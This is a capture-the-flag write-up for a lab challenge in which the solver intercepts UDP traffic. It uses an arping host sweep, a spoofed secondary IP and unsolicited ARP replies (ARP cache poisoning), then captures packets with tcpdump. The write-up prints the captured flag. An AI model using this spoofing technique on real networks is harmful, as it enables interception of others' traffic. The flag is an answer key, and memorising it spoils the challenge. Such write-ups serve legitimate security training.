# Interception I

## Question

192.168.0.1 is periodically (once every 4 seconds) sending the flag to 192.168.0.2 over UDP port 8000. Go get it.

```bash
ssh ctf-1@host.cg21.metaproblems.com -p 7000
```

If you get an SSH host key error, consider using

```bash
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" ctf-1@host.cg21.metaproblems.com -p 7000
```

Note that the connection can take a while to initialize. It will say Granting console connection to device... and then three dots will appear. After the third dot you should have a connection.

## Hint

![network diagram](images/interception_i_network_diagram.png)

## Solution

1. Check for working hosts:

    ```sh
    for num in $(seq 1 255); do arping -c 1 192.168.0.$num | grep "1 response" > /dev/null && echo "192.168.0.$num"; done
    192.168.0.1
    192.168.0.2
    ```

    The command above can be broken down as follows:

    ```sh
    1 for num in $(seq 1 254); do
    2     arping -c 1 192.168.0.$num | grep "1 response" > /dev/null 
    3     && echo "192.168.0.$num"
    4 done
    ```

    * Line 1: Starts a for loop with the sequence of numbers between 1 and 254. You can also do smaller numbers here.
    * Line 2: Run [arping](https://man7.org/linux/man-pages/man8/arping.8.html) and send only one packet. Then, look for "1 response" in the output which shows a host responded.
    * Line3: Print out the IP Address to the console.

2. Add a *secondary* ip to eth0:

    ```sh
    ip addr add 192.168.0.2/24 dev eth0
    ```

3. Then run the attack:

    ```sh
     arping -c 4 -U -I eth0 -s 192.168.0.2 192.168.0.1 && tcpdump -vv -X udp port 8000
    ```

    The command above can be broken down as follows:

    ```sh
    1 arping -c 4 -U -I eth0 -s 192.168.0.2 192.168.0.1
    2 && tcpdump -vv -X udp port 8000
    ```

    * Line 1: Run [arping](https://man7.org/linux/man-pages/man8/arping.8.html) with a count of 4 (send for packets) over eth0 using the source if `192.168.0.2`. The source is the same IP addressed add to your interface. Use the destination of `192.168.0.1` which is the victim host. "-U" is unsolicited updates (Basically, the command tells `192.168.0.1` where to find `192.168.0.2` if the host did not ask for it.)
    * Line 2: Run [tcpdump](https://man7.org/linux/man-pages/man8/tcpdump.8.html) to capture traffic.
      * "-vv" shows more output.
      * "-X" shows the hex view of the packet (think of [xxd](https://linux.die.net/man/1/xxd)).
      * "udp port 8000" is a capture filter for what we are looking for.

4. You get the following output from the above command:

    ```sh
    ARPING 192.168.0.1 from 192.168.0.2 eth0
    Unicast reply from 192.168.0.1 [02:42:0a:01:d4:82] 0.018ms
    Unicast reply from 192.168.0.1 [02:42:0a:01:d4:82] 0.017ms
    Unicast reply from 192.168.0.1 [02:42:0a:01:d4:82] 0.018ms
    Sent 4 probe(s) (0 broadcast(s))
    Received 3 response(s) (0 request(s), 0 broadcast(s))
    tcpdump: listening on eth0, link-type EN10MB (Ethernet), snapshot length 262144 bytes
    12:00:37.458897 IP (tos 0x0, ttl 64, id 41841, offset 0, flags [DF], proto UDP (17), length 63)
        ip-192-168-0-1.ec2.internal.35877 > ip-192-168-0-2.ec2.internal.8000: [bad udp cksum 0x8190 -> 0xda62!] UDP, length 35
            0x0000:  4500 003f a371 4000 4011 15e9 c0a8 0001  E..?.q@.@.......
            0x0010:  c0a8 0002 8c25 1f40 002b 8190 4d65 7461  .....%.@.+..Meta
            0x0020:  4354 467b 6164 6472 3373 355f 7233 7330  CTF{addr3s5_r3s0
            0x0030:  6c75 7431 6f6e 5f70 776e 3467 337d 0a    lut1on_pwn4g3}.
    ```

flag: MetaCTF{addr3s5_r3s0lut1on_pwn4g3}
